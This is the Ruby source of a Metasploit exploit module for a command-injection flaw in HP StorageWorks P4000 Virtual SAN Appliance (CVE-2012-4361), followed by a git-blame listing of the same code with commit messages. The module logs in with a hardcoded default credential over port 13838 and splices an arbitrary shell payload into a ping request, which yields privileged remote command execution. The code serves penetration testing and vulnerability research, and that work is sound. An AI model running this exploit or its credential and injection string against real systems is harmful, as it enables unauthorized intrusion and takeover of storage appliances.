modules/exploits/multi/misc/hp_vsa_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info={})
    super(update_info(info,
      'Name'           => "HP StorageWorks P4000 Virtual SAN Appliance Command Execution",
      'Description'    => %q{
          This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on
        versions prior to 9.5. By using a default account credential, it is possible
        to inject arbitrary commands as part of a ping request via port 13838.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Nicolas Gregoire',  #Discovery, PoC, additional assistance
          'sinn3r'             #Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2012-4361'],
          ['OSVDB', '82087'],
          ['EDB', '18893'],
          ['URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?loc=en_US&id=958'],
          ['URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03082086'],
          ['URL', 'http://www.agarri.fr/blog/archives/2012/02/index.html'] # Original Disclosure
        ],
      'Payload'        =>
        {
          'BadChars' => "/",
          'Compat'   =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet'
            }
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => %w{ linux unix },
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          [ 'Automatic',        {} ],
          [ 'HP VSA up to 8.5', { 'Version' => '8.5.0' } ],
          [ 'HP VSA 9',         { 'Version' => '9.0.0' } ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => '2011-11-11',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('RPORT', [true, 'The remote port', 13838])
      ])
  end


  def generate_packet(data)
    pkt = "\x00\x00\x00\x00\x00\x00\x00\x01"
    pkt << [data.length + 1].pack("N*")
    pkt << "\x00\x00\x00\x00"
    pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"
    pkt << "\x00\x00\x00\x14\xff\xff\xff\xff"
    pkt << data
    pkt << "\x00"

    pkt
  end

  def get_target
    if target.name !~ /Automatic/
      return target
    end

    # Login at 8.5.0
    packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"8.5.0\"")
    print_status("#{rhost}:#{rport} Sending login packet for version 8.5.0")
    sock.put(packet)
    res = sock.get_once
    vprint_status(Rex::Text.to_hex_dump(res)) if res
    if res and res=~ /OK/ and res=~ /Login/
      return targets[1]
    end

    # Login at 9.0.0
    packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"9.0.0\"")
    print_status("#{rhost}:#{rport} Sending login packet for version 9.0.0")
    sock.put(packet)
    res = sock.get_once
    vprint_status(Rex::Text.to_hex_dump(res)) if res
    if res and res=~ /OK/ and res =~ /Login/
      return targets[2]
    end

    fail_with(Failure::NoTarget, "#{rhost}:#{rport} - Target auto detection didn't work'")
  end

  def exploit
    connect

    if target.name =~ /Automatic/
      my_target = get_target
      print_good("#{rhost}:#{rport} - Target #{my_target.name} found")
    else
      my_target = target
      print_status("#{rhost}:#{rport} Sending login packet")
      packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{my_target['Version']}\"")
      sock.put(packet)
      res = sock.get_once
      vprint_status(Rex::Text.to_hex_dump(res)) if res
    end

    # Command execution
    print_status("#{rhost}:#{rport} Sending injection")
    data = "get:/lhn/public/network/ping/127.0.0.1/foobar;#{payload.encoded}/"
    data << "64/5/" if my_target.name =~ /9/
    packet = generate_packet(data)
    sock.put(packet)
    res = sock.get_once
    vprint_status(Rex::Text.to_hex_dump(res)) if res

    handler
    disconnect
  end
end
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`Rank = ExcellentRanking`
Retab modules 2013-08-30 16:28:54 -05:00
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`include Msf::Exploit::Remote::Tcp`
Retab modules 2013-08-30 16:28:54 -05:00
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "HP StorageWorks P4000 Virtual SAN Appliance Command Execution",`
			`'Description' => %q{`
Noting rhost/rport, cli.peerhost where appropriate 2012-05-21 11:19:02 -05:00			`This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on`
make msftidy happy 2013-02-15 19:01:58 +01:00			`versions prior to 9.5. By using a default account credential, it is possible`
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`to inject arbitrary commands as part of a ping request via port 13838.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Nicolas Gregoire', #Discovery, PoC, additional assistance`
Noting rhost/rport, cli.peerhost where appropriate 2012-05-21 11:19:02 -05:00			`'sinn3r' #Metasploit module`
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`],`
			`'References' =>`
			`[`
CVE and OSVDB update 2013-06-25 02:06:20 -05:00			`['CVE', '2012-4361'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '82087'],`
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`['EDB', '18893'],`
			`['URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?loc=en_US&id=958'],`
Adding extra ref from jjarmoc 2012-05-21 16:48:39 -05:00			`['URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03082086'],`
			`['URL', 'http://www.agarri.fr/blog/archives/2012/02/index.html'] # Original Disclosure`
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`],`
			`'Payload' =>`
			`{`
			`'BadChars' => "/",`
			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd',`
Fix #5659 : Update CMD exploits payload compatibility options 2015-08-10 17:12:59 -05:00			`'RequiredCmd' => 'generic perl telnet'`
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`}`
			`},`
			`'DefaultOptions' =>`
			`{`
change exitfunc to thread 2015-09-01 10:43:45 +02:00			`'EXITFUNC' => 'thread'`
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`},`
Prefer Ruby style for single word collections 2013-09-24 12:33:31 -05:00			`'Platform' => %w{ linux unix },`
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`'Arch' => ARCH_CMD,`
			`'Targets' =>`
			`[`
make msftidy happy 2013-02-15 19:01:58 +01:00			`[ 'Automatic', {} ],`
			`[ 'HP VSA up to 8.5', { 'Version' => '8.5.0' } ],`
			`[ 'HP VSA 9', { 'Version' => '9.0.0' } ]`
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`],`
make msftidy happy 2013-02-15 19:01:58 +01:00			`'Privileged' => true,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2011-11-11',`
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`'DefaultTarget' => 0))`
Retab modules 2013-08-30 16:28:54 -05:00
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`register_options(`
			`[`
			`OptPort.new('RPORT', [true, 'The remote port', 13838])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00

Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`def generate_packet(data)`
			`pkt = "\x00\x00\x00\x00\x00\x00\x00\x01"`
			`pkt << [data.length + 1].pack("N*")`
			`pkt << "\x00\x00\x00\x00"`
			`pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"`
			`pkt << "\x00\x00\x00\x14\xff\xff\xff\xff"`
			`pkt << data`
			`pkt << "\x00"`
Retab modules 2013-08-30 16:28:54 -05:00
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`pkt`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
make msftidy happy 2013-02-15 19:01:58 +01:00			`def get_target`
			`if target.name !~ /Automatic/`
			`return target`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
make msftidy happy 2013-02-15 19:01:58 +01:00			`# Login at 8.5.0`
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"8.5.0\"")`
make msftidy happy 2013-02-15 19:01:58 +01:00			`print_status("#{rhost}:#{rport} Sending login packet for version 8.5.0")`
			`sock.put(packet)`
			`res = sock.get_once`
			`vprint_status(Rex::Text.to_hex_dump(res)) if res`
			`if res and res=~ /OK/ and res=~ /Login/`
			`return targets[1]`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
make msftidy happy 2013-02-15 19:01:58 +01:00			`# Login at 9.0.0`
			`packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"9.0.0\"")`
			`print_status("#{rhost}:#{rport} Sending login packet for version 9.0.0")`
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`sock.put(packet)`
			`res = sock.get_once`
			`vprint_status(Rex::Text.to_hex_dump(res)) if res`
make msftidy happy 2013-02-15 19:01:58 +01:00			`if res and res=~ /OK/ and res =~ /Login/`
			`return targets[2]`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Missed these little devils 2013-08-15 16:50:13 -05:00			`fail_with(Failure::NoTarget, "#{rhost}:#{rport} - Target auto detection didn't work'")`
make msftidy happy 2013-02-15 19:01:58 +01:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
make msftidy happy 2013-02-15 19:01:58 +01:00			`def exploit`
			`connect`
Retab modules 2013-08-30 16:28:54 -05:00
make msftidy happy 2013-02-15 19:01:58 +01:00			`if target.name =~ /Automatic/`
			`my_target = get_target`
			`print_good("#{rhost}:#{rport} - Target #{my_target.name} found")`
			`else`
			`my_target = target`
			`print_status("#{rhost}:#{rport} Sending login packet")`
			`packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{my_target['Version']}\"")`
			`sock.put(packet)`
			`res = sock.get_once`
			`vprint_status(Rex::Text.to_hex_dump(res)) if res`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`# Command execution`
Noting rhost/rport, cli.peerhost where appropriate 2012-05-21 11:19:02 -05:00			`print_status("#{rhost}:#{rport} Sending injection")`
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`data = "get:/lhn/public/network/ping/127.0.0.1/foobar;#{payload.encoded}/"`
make msftidy happy 2013-02-15 19:01:58 +01:00			`data << "64/5/" if my_target.name =~ /9/`
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`packet = generate_packet(data)`
			`sock.put(packet)`
			`res = sock.get_once`
			`vprint_status(Rex::Text.to_hex_dump(res)) if res`
Retab modules 2013-08-30 16:28:54 -05:00
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 14:53:45 -05:00			`handler`
			`disconnect`
			`end`
Noting rhost/rport, cli.peerhost where appropriate 2012-05-21 11:19:02 -05:00			`end`